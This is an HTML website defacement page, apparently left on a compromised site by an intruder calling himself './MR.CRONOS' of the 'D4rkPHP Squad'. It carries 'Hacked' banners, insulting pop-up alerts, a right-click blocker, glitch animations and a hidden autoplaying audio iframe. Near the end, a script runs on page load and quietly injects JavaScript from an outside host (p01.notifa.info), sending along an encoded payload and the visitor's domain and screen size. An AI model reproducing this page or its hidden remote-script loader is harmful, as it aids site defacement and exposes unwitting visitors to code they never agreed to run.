<!DOCTYPE html>
<html>
<script>
  alert("WELCOM ADMIN");
</script>
<script>
  alert("MR.CRONOS WUSS HERE");
</script>

<head>
	<title>HacKed By ./MR.CRONOS</title>
	<link href="https://fonts.googleapis.com/css?family=Amatic+SC:400,700" rel="stylesheet">
	<meta name="author" content="./MR.CRONOS">
	<meta charset="utf-8">
	<link href="https://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet">
	<style type="text/css">
	@import url('https://fonts.googleapis.com/css?family=Jolly+Lodger');
	body{
		background-image: url();
		background-color: black;
		background-repeat: no-repeat;
		background-attachment: fixed;
		background-size: 100% 100%;
	}
	.glitchtext {
		justify-content: center;
		align-items: center;
		display: flex;
	}
	.text {
		font-family: "Jolly Lodger";
		font-size: 19.5px;
		color: #000000;
		text-shadow: 0 0 12.5px #0087FF;
		margin: 4%;
		margin-top: 2%;
	}
	.dud {
		color: #757575;
	}
	.matrix {color: lime; font-family: "Jolly Lodger";  font-size:57pt; text-align:center; width:10px; padding:0px; margin:0px;}

	h1 {
		color: #000000;
		font-family: "Jolly Lodger";
		font-size: 60px;
		font-weight: 400;
		text-align: center;
		margin: 0;
		line-height: 0;
		animation: glitch1 2.5s infinite;
	}
	h1:nth-child(2) {
		color: #67f3da;
		animation: glitch2 2.5s infinite;
	}
	h1:nth-child(3) {
		color: #f16f6f;
		animation: glitch3 2.5s infinite;
	}
	@keyframes glitch1 {
		0% {
			transform: none;
			opacity: 1;
		}
		7% {
			transform: skew(-0.5deg, -0.9deg);
			opacity: 0.75;
		}
		10% {
			transform: none;
			opacity: 1;
		}
		27% {
			transform: none;
			opacity: 1;
		}
		30% {
			transform: skew(0.8deg, -0.1deg);
			opacity: 0.75;
		}
		35% {
			transform: none;
			opacity: 1;
		}
		52% {
			transform: none;
			opacity: 1;
		}
		55% {
			transform: skew(-1deg, 0.2deg);
			opacity: 0.75;
		}
		50% {
			transform: none;
			opacity: 1;
		}
		72% {
			transform: none;
			opacity: 1;
		}
		75% {
			transform: skew(0.4deg, 1deg);
			opacity: 0.75;
		}
		80% {
			transform: none;
			opacity: 1;
		}
		100% {
			transform: none;
			opacity: 1;
		}
	}

	@keyframes glitch2 {
		0% {
			transform: none;
			opacity: 0.25;
		}
		7% {
			transform: translate(-2px, -3px);
			opacity: 0.5;
		}
		10% {
			transform: none;
			opacity: 0.25;
		}
		27% {
			transform: none;
			opacity: 0.25;
		}
		30% {
			transform: translate(-5px, -2px);
			opacity: 0.5;
		}
		35% {
			transform: none;
			opacity: 0.25;
		}
		52% {
			transform: none;
			opacity: 0.25;
		}
		55% {
			transform: translate(-5px, -1px);
			opacity: 0.5;
		}
		50% {
			transform: none;
			opacity: 0.25;
		}
		72% {
			transform: none;
			opacity: 0.25;
		}
		75% {
			transform: translate(-2px, -6px);
			opacity: 0.5;
		}
		80% {
			transform: none;
			opacity: 0.25;
		}
		100% {
			transform: none;
			opacity: 0.25;
		}
	}

	@keyframes glitch3 {
		0% {
			transform: none;
			opacity: 0.25;
		}
		7% {
			transform: translate(2px, 3px);
			opacity: 0.5;
		}
		10% {
			transform: none;
			opacity: 0.25;
		}
		27% {
			transform: none;
			opacity: 0.25;
		}
		30% {
			transform: translate(5px, 2px);
			opacity: 0.5;
		}
		35% {
			transform: none;
			opacity: 0.25;
		}
		52% {
			transform: none;
			opacity: 0.25;
		}
		55% {
			transform: translate(5px, 1px);
			opacity: 0.5;
		}
		50% {
			transform: none;
			opacity: 0.25;
		}
		72% {
			transform: none;
			opacity: 0.25;
		}
		75% {
			transform: translate(2px, 6px);
			opacity: 0.5;
		}
		80% {
			transform: none;
			opacity: 0.25;
		}
		100% {
			transform: none;
			opacity: 0.25;
		}
	}
</style>
</head>
<script language="JavaScript">
// ini efek buat text di title
 function tb5_makeArray(n){
 this.length = n;
 return this.length;
}
 
tb5_messages = new tb5_makeArray(3);
tb5_messages[0] = "Hacked??"; // text yang pertama
tb5_messages[1] = "MR.CRONOS WUSS HERE"; // yang kedua
tb5_messages[2] = "GOBLOK"; // yang ketiga
tb5_rptType = 'infinite';
tb5_rptNbr = 20;
tb5_speed = 40;
tb5_delay = 2000;
var tb5_counter=2;
var tb5_currMsg=0;
var tb5_stsmsg="";
function tb5_shuffle(arr){
var k;
for (i=0; i<arr.length; i++){
 k = Math.round(Math.random() * (arr.length - i - 1)) + i;
 temp = arr[i];arr[i]=arr[k];arr[k]=temp;
}
return arr;
}
tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){
 tb5_arr[i] = i;
 tb5_sts[i] = "_";
}
tb5_arr = tb5_shuffle(tb5_arr);
function tb5_init(n){
var k;
if (n == tb5_arr.length){
 if (tb5_currMsg == tb5_messages.length-1){
 if ((tb5_rptType == 'finite') && (tb5_counter==tb5_rptNbr)){
 clearTimeout(tb5_timerID);
 return;
 }
 tb5_counter++;
 tb5_currMsg=0;
 }
 else{
 tb5_currMsg++;
 }
 n=0;
 tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
 tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
 for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){
 tb5_arr[i] = i;
 tb5_sts[i] = "_";
 }
 tb5_arr = tb5_shuffle(tb5_arr);
 tb5_sp=tb5_delay;
}
else{
 tb5_sp=tb5_speed;
 k = tb5_arr[n];
 tb5_sts[k] = tb5_messages[tb5_currMsg].charAt(k);
 tb5_stsmsg = "";
 for (var i=0; i<tb5_sts.length; i++)
 tb5_stsmsg += tb5_sts[i];
 document.title = tb5_stsmsg;
 n++;
 }
 tb5_timerID = setTimeout("tb5_init("+n+")", tb5_sp);
}
function tb5_randomizetitle(){
 tb5_init(0);
}
tb5_randomizetitle();
// ANTI KLIK KANAN
var message="COPAS? KUY GELUDD";
///////////////////////////////////
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}
function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}
if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}
document.oncontextmenu=new Function("alert(message);return false")
// -->
</script>
<script type="text/javascript" language="javascript">
 
 
 
<!--
 
var rows=1; // must be an odd number
 
var speed=20; // lower is faster
 
var reveal=5; // between 0 and 2 only. The higher, the faster the word appears
 
var effectalign="center" //enter "center" to center it.
 
 
 
/***********************************************
 
* Just Edit:v
 
***********************************************/
 
 
 
 
var w3c=document.getElementById && !window.opera;;
 
var ie45=document.all && !window.opera;
 
var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
 
var m_coch=new Array();
 
var m_copo=new Array();
 
window.onload=function() {
 
    if (!w3c && !ie45) return
 
 var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
 
 ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
 
 ma_txt=" "+ma_txt+" ";
 
 columns=ma_txt.length;
 
 if (w3c) {
 
   while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
 
   ma_tab=document.createElement("table");
 
   ma_tab.setAttribute("border", 0);
 
   ma_tab.setAttribute("align", effectalign);
 
   ma_tab.style.backgroundColor="#000000";
 
   ma_bod=document.createElement("tbody");
 
   for (x=0; x<rows; x++) {
 
     ma_row=document.createElement("tr");
 
     for (y=0; y<columns; y++) {
 
       matemp=document.createElement("td");
 
       matemp.setAttribute("id", "Mx"+x+"y"+y);
 
       matemp.className="matrix";
 
       matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
 
       ma_row.appendChild(matemp);
 
     }
 
     ma_bod.appendChild(ma_row);
 
   }
 
   ma_tab.appendChild(ma_bod);
 
   matrix.appendChild(ma_tab);
 
 } else {
 
   ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
 
   for (var x=0; x<rows; x++) {
 
     ma_tab+='<t'+'r>';
 
     for (var y=0; y<columns; y++) {
 
       ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'"> </'+'td>';
 
     }
 
     ma_tab+='</'+'tr>';
 
   }
 
   ma_tab+='</'+'table>';
 
   matrix.innerHTML=ma_tab;
 
 }
 
 ma_cho=ma_txt;
 
 for (x=0; x<columns; x++) {
 
   ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
 
   m_copo[x]=0;
 
 }
 
 ma_bod=setInterval("mytricks()", speed);
 
}
 
 
 
function mytricks() {
 
 x=0;
 
 for (y=0; y<columns; y++) {
 
   x=x+(m_copo[y]==100);
 
   ma_row=m_copo[y]%100;
 
   if (ma_row && m_copo[y]<100) {
 
     if (ma_row<rows+1) {
 
       if (w3c) {
 
         matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
 
         matemp.firstChild.nodeValue=m_coch[y];
 
       }
 
       else {
 
         matemp=document.all["Mx"+(ma_row-1)+"y"+y];
 
         matemp.innerHTML=m_coch[y];
 
       }
 
       matemp.style.color="#81F2FF";
 
       matemp.style.fontWeight="bold";
 
     }
 
     if (ma_row>1 && ma_row<rows+2) {
 
       matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
 
       matemp.style.fontWeight="normal";
 
       matemp.style.color="#00BBFF";
 
     }
 
     if (ma_row>2) {
 
         matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
 
       matemp.style.color="#20FFDA";
 
     }
 
     if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
 
     else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
 
     else if (ma_row<rows+2) m_copo[y]++;
 
     else if (m_copo[y]<100) m_copo[y]=0;
 
   }
 
   else if (Math.random()>0.9 && m_copo[y]<100) {
 
     m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
 
     m_copo[y]++;
 
   }
 
 }
 
 if (x==columns) clearInterval(ma_bod);
 
}
 
 
 
function zoomer(ycol) {
 
 var mtmp, mtem, ytmp;
 
 if (m_copo[ycol]==Math.floor(rows/2)+1) {
 
   for (ytmp=0; ytmp<rows; ytmp++) {
 
     if (w3c) {
 
       mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
 
       mtmp.firstChild.nodeValue=m_coch[ycol];
 
     }
 
     else {
 
       mtmp=document.all["Mx"+ytmp+"y"+ycol];
 
       mtmp.innerHTML=m_coch[ycol];
 
     }
 
     mtmp.style.color="#5BEEFF";
 
     mtmp.style.fontWeight="bold";
 
   }
 
   if (Math.random()<reveal) {
 
     mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
 
     ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
 
   }
 
   if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
 
   m_copo[ycol]+=199;
 
   setTimeout("zoomer("+ycol+")", speed);
 
 }
 
 else if (m_copo[ycol]>200) {
 
   if (w3c) {
 
     mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
 
     mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
 
   }
 
   else {
 
     mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
 
     mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
 
   }
 
   mtmp.style.fontWeight="normal";
 
   mtem.style.fontWeight="normal";
 
   setTimeout("zoomer("+ycol+")", speed);
 
 }
 
 else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
 
 if (m_copo[ycol]>100 && m_copo[ycol]<200) {
 
   if (w3c) {
 
     mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
 
     mtmp.firstChild.nodeValue=String.fromCharCode(160);
 
     mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
 
     mtem.firstChild.nodeValue=String.fromCharCode(160);
 
   }
 
   else {
 
     mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
 
     mtmp.innerHTML=String.fromCharCode(160);
 
     mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
 
     mtem.innerHTML=String.fromCharCode(160);
 
   }
 
   setTimeout("zoomer("+ycol+")", speed);
 
 }
 
 
 
 //start
 
var h1 = document.getElementsByTagName("h1")[0],
 
text = h1.innerText || h1.textContent,
 
split = [], i, lit = 0, timer = null;
 
for(i = 0; i < text.length; ++i) {
 
split.push("<span>" + text[i] + "</span>");
 
}
 
h1.innerHTML = split.join("");
 
split = h1.childNodes;
 
 
 
var flicker = function() {
 
lit += 0.01;
 
if(lit >= 1) {
 
clearInterval(timer);
 
}
 
for(i = 0; i < split.length; ++i) {
 
if(Math.random() < lit) {
 
split[i].className = "neon";
 
} else {
 
split[i].className = "";
 
}
 
}
 
}
 
setInterval(flicker, 100);
 
 
 
}
 
//strat sec
 
 
 
// end  -->
 
</script>
<body>
	<div id="matrix" class="auto-style8">I Not Alone !!</div><br>
	<center>"
		<br><br><br>
		<div id="glitchtext">
			<h1>./MR.CRONOS</h1>
			<h1>./MR.CRONOS</h1>
			<h1>./MR.CRONOS</h1>        	     	     	
		</div><br><br>
		<font color="white" size="6" face="Jolly Lodger">We Are The Dark
 in your system </font><br><br>
		<font color="white" size="6" face="Jolly Lodger"><3</font><br>
		<font color="white" size="5" face="Jolly Lodger">"Thanks to: .ITzCsTFuCk ~ ./TyR3x.yr ~ Mr.Cronos and  all member D4rkPHP Squad "<br>
</font>
<font color="white" size="6" face="Jolly Lodger"><since 2k18</font><br>
		<center>
		<font color="white" size="4" face="Jolly Lodger">&copy 2018 !</font></center>
	<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m5bYnu6tGARiUvU5X6I16YJnA%2b5EJ4gU7oT4NyAns1HDJb8iRGFJ6U2KKyz6DiyvqgWC3idl1eAEYqBjMlQH0Cj7Ld2OHZ3%2fV0yIXOwHOYMjEpqxueQX%2bC%2bVauF%2bOCnYyfDX%2fmgV6ih1aV7zTOot5KA%2fajEwMwEhdh7PsOI2f62auA%2fr5wGaw0wuTCEnp8Bvhq%2bgGSiMEQ7Inbj8O0tIEEJk6kiOg9zkPyw9oczaiKi82eDjgxYvuafkukcWbk0MupZBGSyOSTy3fuBDxbnRUSOhvD9hMa4ckwnZgryIX7JnrixNJtC5urJCH%2fG2pgiNo5fO3iPiepgQON%2bmFoinpqRr3UcfUHOAseJihjT3M6Sc5S16xRkzocBoje4yPWN1xDwf8%2ftAf0YKcrbibRExLLcWdesv3LlrvsJ3e3NwTVM7IfMHMLrVgz%2fWFX4BOXMuqL8MgwIcBY2A6oa4iNX7w1UX5KaqPCDKxiEGnyoeoHcHp4%2f78Hwz8DIq5rUAIogC75ZxO%2bHxPgRtwYVkR65PZ0exDWU5ijBfYuF4OmcKWkpc%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
	// auto lagunya
	<iframe width="0%" height="0" scrolling="no" frameborder="no" src="https://api.soundcloud.com/tracks/147665621/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf;color=ff5500&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false"></iframe>
<p>&nbsp;</p>
	</html>
